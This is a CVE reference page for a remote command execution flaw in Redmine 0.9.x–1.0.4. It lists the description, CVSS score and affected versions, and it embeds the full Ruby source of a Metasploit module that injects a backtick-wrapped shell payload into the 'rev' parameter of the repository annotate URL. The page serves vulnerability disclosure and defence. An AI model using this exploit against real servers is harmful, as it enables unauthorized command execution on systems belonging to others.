Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
Unspecified vulnerability in the bazaar repository adapter in Redmine 0.9.x and 1.0.x before 1.0.5 allows remote attackers to execute arbitrary commands via unknown vectors.
CVE Informations
Related Weaknesses
| Weakness Name | Source | |
|---|---|---|
| No informations. |
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 41695
Publication date : 2010-12-18 23h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Redmine SCM Repository Arbitrary Command Execution',
'Description' => %q{
This module exploits an arbitrary command execution vulnerability in the
Redmine repository controller. The flaw is triggered when a rev parameter
is passed to the command line of the SCM tool without adequate filtering.
},
'Author' => [ 'joernchen <joernchen[at]phenoelit.de>' ], #Phenoelit
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2011-4929'],
['OSVDB', '70090'],
['URL', 'http://www.redmine.org/news/49' ]
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 512,
'Compat' =>
{
'PayloadType' => 'cmd',
#'RequiredCmd' => 'generic telnet',
}
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic', { }]],
'DisclosureDate' => 'Dec 19 2010',
'DefaultTarget' => 0))
register_options(
[
OptString.new('URI', [true, "The full URI path to the project", "/projects/1/"]),
], self.class)
end
def exploit
command = Rex::Text.uri_encode(payload.encoded)
urlconfigdir = normalize_uri(datastore['URI'], "/repository/annotate") + "?rev=`#{command}`"
res = send_request_raw({
'uri' => urlconfigdir,
'method' => 'GET',
'headers' =>
{
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'Connection' => 'Close',
}
}, 25)
if (res)
print_status("The server returned: #{res.code} #{res.message}")
else
print_status("No response from the server")
end
handler
end
end
Products Mentioned
Configuraton 0
Redmine>>Redmine >> Version 0.9.0
- Redmine>>Redmine >> Version 0.9.0 (Open CPE detail)
Redmine>>Redmine >> Version 0.9.1
- Redmine>>Redmine >> Version 0.9.1 (Open CPE detail)
Redmine>>Redmine >> Version 0.9.2
- Redmine>>Redmine >> Version 0.9.2 (Open CPE detail)
Redmine>>Redmine >> Version 0.9.3
- Redmine>>Redmine >> Version 0.9.3 (Open CPE detail)
Redmine>>Redmine >> Version 0.9.4
- Redmine>>Redmine >> Version 0.9.4 (Open CPE detail)
Redmine>>Redmine >> Version 0.9.5
- Redmine>>Redmine >> Version 0.9.5 (Open CPE detail)
Redmine>>Redmine >> Version 0.9.6
- Redmine>>Redmine >> Version 0.9.6 (Open CPE detail)
Redmine>>Redmine >> Version 1.0.0
- Redmine>>Redmine >> Version 1.0.0 (Open CPE detail)
Redmine>>Redmine >> Version 1.0.1
- Redmine>>Redmine >> Version 1.0.1 (Open CPE detail)
Redmine>>Redmine >> Version 1.0.2
- Redmine>>Redmine >> Version 1.0.2 (Open CPE detail)
Redmine>>Redmine >> Version 1.0.3
- Redmine>>Redmine >> Version 1.0.3 (Open CPE detail)
Redmine>>Redmine >> Version 1.0.4
- Redmine>>Redmine >> Version 1.0.4 (Open CPE detail)
References
2025©
tesweb SA
